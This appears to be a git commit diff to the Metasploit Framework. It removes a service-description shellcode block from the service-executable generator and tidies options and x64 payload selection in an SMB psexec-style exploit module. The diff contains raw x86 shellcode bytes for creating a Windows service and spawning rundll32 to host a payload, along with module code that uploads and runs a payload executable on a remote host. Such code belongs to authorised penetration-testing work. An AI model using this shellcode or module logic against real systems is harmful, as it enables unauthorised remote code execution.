SERVICE_DESCRIPTION doesn't concern this PR
This commit is contained in:
parent
bb4e9e2d4d
commit
808f87d213
|
@ -539,20 +539,6 @@ require 'msf/core/exe/segment_injector'
|
|||
"\x00\x6A\x00\x6A\x00\x6A\x01\x6A\x10\x89\xE1\x6A\x00\x51\x50\x68" +
|
||||
"\xC6\x55\x37\x7D\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5"
|
||||
|
||||
code_service_description = ""
|
||||
|
||||
if opts[:servicedescription]
|
||||
pushed_service_description = string_to_pushes(opts[:servicedescription])
|
||||
|
||||
code_service_description =
|
||||
"\x68\x3F\x00\x0F\x00\x6A\x00\x6A\x00\x68\x67\xF0\x36" +
|
||||
"\x76\xFF\xD5\x89\xC7"+pushed_service_name+"\x89\xE1\x68" +
|
||||
"\xFF\x01\x0F\x00\x51\x50\x68\x56\x28\x4B\x40\xFF\xD5\x89\xC6" +
|
||||
pushed_service_description+"\x89\xE1\x6A\x00\x51\x89\xE1\x51" +
|
||||
"\x6A\x01\x50\x68\x87\xB0\x35\xED\xFF\xD5\x56\x68\xDE\xEA\x77" +
|
||||
"\xAD\xFF\xD5\x57\x68\xDE\xEA\x77\xAD\xFF\xD5"
|
||||
end
|
||||
|
||||
precode_size = 0x42
|
||||
shellcode_code_offset = code_service_stopped.length + precode_size
|
||||
|
||||
|
@ -575,8 +561,7 @@ require 'msf/core/exe/segment_injector'
|
|||
[hash_code_offset].pack('<I')+pushed_service_name+"\x89\xE1\x8D" +
|
||||
"\x85"+[svcctrlhandler_code_offset].pack('<I')+"\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" +
|
||||
"\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" +
|
||||
"\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" +
|
||||
code_service_description+"\x31\xFF\x6A" +
|
||||
"\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5\x31\xFF\x6A" +
|
||||
"\x04\x68\x00\x10\x00\x00\x6A\x54\x57\x68\x58\xA4\x53\xE5\xFF\xD5" +
|
||||
"\xC7\x00\x44\x00\x00\x00\x8D\x70\x44\x57\x68\x2E\x65\x78\x65\x68" +
|
||||
"\x6C\x6C\x33\x32\x68\x72\x75\x6E\x64\x89\xE1\x56\x50\x57\x57\x6A" +
|
||||
|
|
|
@ -83,8 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),
|
||||
OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
|
||||
OptString.new('SERVICE_NAME', [false, "Servicename to to be used on target for the service binary and manager",nil]),
|
||||
OptString.new('SERVICE_DISPLAYNAME', [false, "Service displayname to to be used on target for the service manager",nil]),
|
||||
OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
|
||||
OptString.new('SERVICE_DISPLAYNAME', [false, "Service displayname to to be used on target for the service manager",nil])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -155,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Disconnect from the ADMIN$
|
||||
simple.disconnect("ADMIN$")
|
||||
else
|
||||
servicename = datastore['SERVICE_NAME'] || "#{rand_text_alpha(8)}"
|
||||
servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
|
||||
servicedescription = datastore['SERVICE_DESCRIPTION'] || rand_text_alpha(rand(32)+1)
|
||||
displayname = datastore['SERVICE_DISPLAYNAME'] || 'M' + rand_text_alpha(rand(32)+1)
|
||||
|
||||
|
@ -180,6 +179,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
exe = ''
|
||||
opts = { :servicename => servicename }
|
||||
if (datastore['PAYLOAD'].include? 'x64')
|
||||
opts.merge!({ :arch => ARCH_X64 })
|
||||
end
|
||||
exe = generate_payload_exe_service(opts)
|
||||
|
||||
fd << exe
|
||||
|
|
Loading…
Reference in New Issue